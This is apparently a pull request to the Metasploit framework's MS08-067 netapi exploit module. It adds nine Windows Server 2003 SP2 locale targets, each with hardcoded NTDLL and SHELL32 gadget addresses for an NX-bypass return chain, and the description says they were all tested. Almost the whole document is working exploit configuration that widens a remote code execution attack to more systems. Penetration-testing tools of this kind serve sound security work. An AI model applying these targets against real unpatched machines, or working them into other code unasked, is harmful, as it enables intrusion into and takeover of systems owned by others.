### PR TITLE
ms08_067_netapi: Add nine Windows 2003 SP2 targets for various locales

### DIFF
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -678,6 +678,17 @@ class MetasploitModule < Msf::Exploit::Remote
            }
           ],
 
+          # Brett Moore's crafty NX bypass for 2003 SP2
+          [ 'Windows 2003 SP2 Portuguese (NX)',
+            {
+              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL OK
+              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL OK
+              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL OK
+              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
+              'Scratch'   => 0x00020408,
+            }
+          ],
+
           # Brett Moore's crafty NX bypass for 2003 SP2 (target by Anderson Bargas)
           [ 'Windows 2003 SP2 Portuguese - Brazilian (NX)',
             {
@@ -688,6 +699,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Scratch'   => 0x00020408,
             }
           ],
+
           # Standard return-to-ESI without NX bypass
           ['Windows 2003 SP2 Spanish (NO NX)',
            {
@@ -715,6 +727,7 @@ class MetasploitModule < Msf::Exploit::Remote
              'Scratch'   => 0x00020408
            }
           ], # JMP ESI WS2HELP.DLL
+
           # Standard return-to-ESI without NX bypass
           # Added by Omar MEZRAG - 0xFFFFFF
           [ 'Windows 2003 SP2 French (NO NX)',
@@ -733,6 +746,94 @@ class MetasploitModule < Msf::Exploit::Remote
               'JmpESP'    => 0x7C98A01B,  # jmp ESP @NTDLL.DLL
               'DisableNX' => 0x7C95F517,  # NX disable @NTDLL.DLL
               'Scratch'   => 0x00020408
+            }
+          ],
+
+          # Brett Moore's crafty NX bypass for 2003 SP2
+          [ 'Windows 2003 SP2 Chinese - Simplified (NX)',
+            {
+              'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL
+              'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
+              'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL
+              'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL
+              'Scratch'   => 0x00020408,
+            }
+          ],
+
+          # Brett Moore's crafty NX bypass for 2003 SP2
+          [ 'Windows 2003 SP2 Czech (NX)',
+            {
+              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
+              'RetPop'    => 0x7cb1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
+              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
+              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
+              'Scratch'   => 0x00020408,
+            }
+          ],
+
+          # Brett Moore's crafty NX bypass for 2003 SP2
+          [ 'Windows 2003 SP2 Dutch (NX)',
+            {
+              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
+              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
+              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
+              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
+              'Scratch'   => 0x00020408,
+            }
+          ],
+
+          # Brett Moore's crafty NX bypass for 2003 SP2
+          [ 'Windows 2003 SP2 Hungarian (NX)',
+            {
+              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
+              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
+              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
+              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
+              'Scratch'   => 0x00020408,
+            }
+          ],
+
+          # Brett Moore's crafty NX bypass for 2003 SP2
+          [ 'Windows 2003 SP2 Italian (NX)',
+            {
+              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
+              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
+              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
+              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
+              'Scratch'   => 0x00020408,
+            }
+          ],
+
+          # Brett Moore's crafty NX bypass for 2003 SP2
+          [ 'Windows 2003 SP2 Russian (NX)',
+            {
+              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
+              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
+              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
+              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
+              'Scratch'   => 0x00020408,
+            }
+          ],
+
+          # Brett Moore's crafty NX bypass for 2003 SP2
+          [ 'Windows 2003 SP2 Swedish (NX)',
+            {
+              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
+              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
+              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
+              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
+              'Scratch'   => 0x00020408,
+            }
+          ],
+
+          # Brett Moore's crafty NX bypass for 2003 SP2
+          [ 'Windows 2003 SP2 Turkish (NX)',
+            {
+              'RetDec'    => 0x7c96beb8,  # dec ESI, ret @NTDLL.DLL
+              'RetPop'    => 0x7cb1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
+              'JmpESP'    => 0x7c96a01b,  # jmp ESP @NTDLL.DLL
+              'DisableNX' => 0x7c93f517,  # NX disable @NTDLL.DLL
+              'Scratch'   => 0x00020408,
             }
           ],
 


### PR DESCRIPTION
MS08-067: Now with 90% more of Brett Moore's crafty NX bypass for 2003 SP2.

All tested.

* Windows 2003 SP2 Portuguese (NX)
* Windows 2003 SP2 Chinese - Simplified (NX)
* Windows 2003 SP2 Czech (NX)
* Windows 2003 SP2 Dutch (NX)
* Windows 2003 SP2 Hungarian (NX)
* Windows 2003 SP2 Italian (NX)
* Windows 2003 SP2 Russian (NX)
* Windows 2003 SP2 Swedish (NX)
* Windows 2003 SP2 Turkish (NX)
